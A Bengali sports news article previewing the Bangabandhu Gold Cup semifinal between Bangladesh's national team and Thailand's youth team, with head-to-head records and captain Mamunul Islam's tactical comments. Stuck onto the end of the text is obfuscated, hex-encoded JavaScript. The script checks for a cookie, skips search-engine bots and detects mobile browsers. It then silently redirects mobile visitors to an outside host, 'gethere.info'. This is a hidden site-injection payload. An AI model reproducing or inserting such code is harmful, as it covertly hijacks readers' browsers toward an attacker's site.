বাঘ-হাতির লড়াই শুক্রবার

BFF_0022
নিজস্ব প্রতিবেদক : লড়াইটা কেনো জঙ্গলে নয়, বঙ্গবন্ধু স্টেডিয়ামের সবুজ ঘাসে। লড়্ইটা ‘বেঙ্গল টাইগার্স’ খ্যাত বাংলাদেশ আর ‘দ্য ওয়ার এলিফ্যান্টস্’ খ্যাত থাইল্যান্ডের। পার্থক্য এতটুকুই-মাঠের লড়াইয়ে বাংলাদেশ জাতীয় দল খেলবে থাইল্যান্ড যুব দলের বিপক্ষে। সাদা চোখে বাংলাদেশই ফেভারিট। আগামীকাল (শুক্রবার) বিকেল ৫ টায় বঙ্গবন্ধু জাতীয় স্টেডিয়ামে শুরু হবে বাঘ আর হাতির লড়াই। এ লড়াই বঙ্গবন্ধু গোল্ডকাপ আন্তর্জাতিক ফুটবলের ফাইনালে ওঠার।
হিংস্র বাঘের শক্তি বেশি, নাকি যুদ্ধবাজ হাতির? তা দেখতে অপেক্ষা করতে হবে ৯০ মিনিট। হতে পাওে ১২০ মিনিট। এমনকি টাইব্রেকার পর্যন্তও। ‘এ’ গ্রুপ রানার্সআপ হয়ে শেষ চারে নাম লিখিয়েছে বাংলাদশ। থাইল্যান্ড যুব দল সেমিফাইনালে উঠেছে দুর্দান্ত দাপটে, গ্রুপ চ্যাম্পিয়ন হয়ে। বুড়ো আর যুবাদের লড়াই বলেই কাগজ-কলমে ফেভারিট বাংলাদেশ। মাঠের পারফরমেন্স বলেছে থাইল্যান্ড।
ফিফা স্বীকৃত ম্যাচে এ পর্যন্ত ১৪ বার মুখোমুখি হয়েছে বাংলাদেশ-থাইল্যান্ড। জয়ের পাল্লা ভারী থাইদেরই। তারা জিতেছে ৯ ম্যাচে। বাংলাদেশ জিতেছে মাত্র ২ টি। বাকি ৩ ম্যাচ ড্র। ১৪ ম্যাচের মধ্যে ৬টি ম্যাচ বিশ্বকাপ বাছাইপর্বের। বাংলাদেশের জয় দুটি বিশ্বকাপ বাছাইয়েই। দুটি জয়ই ঢাকায়। থাইরা জিতেছে ৪ ম্যাচ। আন্তর্জাতিক প্রীতি ম্যাচে ৫ বারের মুখোমুখিতে বাংলাদেশ জয়শূন্য। যে কোন পর্যায়ের ফুটবলের দু’দলের সর্বশেষ সাক্ষাত ২০১২ সালে প্রীতি ম্যাচে। ব্যাংককে অনুষ্ঠিত সে ম্যাচের ফল মোটেও সুখকর নয় লাল-সবুজ জার্সিধারীদের। থাইদের কাছে ০-৫ গোলে বিধ্বস্ত হয় তারা।

BFF_0023
পরিসংখ্যান বলছে, থাইরা বাংলাদেশের জন্য কঠিন প্রতিপক্ষ। অনেকেই বলেছেন, এ টুর্নামেন্টে সবচেয়ে দ্রুতগতির ফুটবল দল থাইরা। বিশেষ করে ফ্রি কিক ও কর্নার কিকে তারা ভয়ঙ্কর। সেটা আমলে নিয়েই গত দুদিন বাংলাদেশ দলকে বিশেষভাবে অনুশীলন করিয়েছেন দলের কোচ লোডভিক ডি ক্রুইফ।
প্রথম ম্যাচে মালয়বাহিনীর কাছে হেরে গেলে চাপে পড়ে যান বাংলাদেশ দলের অধিনায়ক মামুনুল ইসলাম। শ্রীলঙ্কার বিরুদ্ধে ম্যাচের আগে ঘোষণা দিয়েছিলেন, বাংলাদেশ সেমিতে যেতে না পারলে অধিনায়কের পদ থেকে সরে দাঁড়াবেন তিনি। কিন্তু রাবণের দ্বীপদেশ লঙ্কাকে হারিয়ে লক্ষ্যপূরণ করায় তা আর করতে হয়নি এই মিডফিল্ডারকে। থাইদের সমীহ করলেও তাদের হারাতে আত্মবিশ্বাসী মামুনুল, ‘ওরা হতে পারে অনেক শক্তিশালী দল। তবে আমাদের বাড়তি সুবিধা হচ্ছে, আমরা খেলব স্বাগতিক হিসেবে, চেনা মাঠে, চেনা পরিবেশে। সর্বশেষ ম্যাচে লঙ্কাকে হারিয়ে আমরা আছি দারুণ ছন্দে। সবকিছু বিবেচনা করলে সেমির ম্যাচে বাংলাদেশই এগিয়ে। তবে মধ্যমাঠে এগিয়ে থাইল্যান্ড।’ এ প্রসঙ্গে বাংলাদেশ অধিনায়ক বলেন, ‘তাদের মিডফিল্ড খুবই শক্ত। তাদের দুজন মিডফিল্ডার এবং একজন স্ট্রাইকারকে নিয়ে কাজ করেছেন কোচ। এ তিনজনকে কোচ বলেছেন ম্যান টু ম্যান মার্ক করতে।’
থাইল্যান্ডের সঙ্গে নিজেদের তুলনা করতে গিয়ে দেশসেরা এ মিডফিল্ডার বলেন, ‘তাদের সঙ্গে তুলনা করলে আমরা অনেক গতিতে খেলি। চেষ্টা করি পুরো ৯০ মিনিট একই ধরণের এ্যাটাকিং ফুটবল খেলতে। যেটা প্রথম ম্যাচে খেলেছি। দ্বিতীয় ম্যাচেও খেলেছি। প্রথম ১০-১৫ মিনিট আর মাঝের কিছুটা সময় তারা সমস্যা করে। কারণ তারাও এ্যাটাকিং ফুটবল খেলে।’
থাইল্যান্ডের বিপক্ষে ম্যাচের কৌশলে পরিবর্তন আসতে পারে বলে আভাস দেন মামুনুল, ‘আমরা যে ধরনের খেলা আগের দুই ম্যাচে খেলেছি। যেমন ছোট ছোট পাসে খেলা। তাতে হয়তো কিছু পরিবর্তন আসতে পারে। ওরা যখন উঠবে আমরা তখন সরাসরি কাউন্টার এ্যাটাকে চলে যাব। কারণ আমাদের কাউন্টার প্লেয়ার অনেক ভাল আছে। চেষ্টা করবো মাঝমাঠে থাইল্যান্ডকে নিস্ক্রিয় করে রাখতে। জাহিদ আর সোহেলকে নিউট্রাল প্লেয়ার দিয়েছেন কোচ। তাদেরকে দু’দিক সামলাতে হবে।’var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}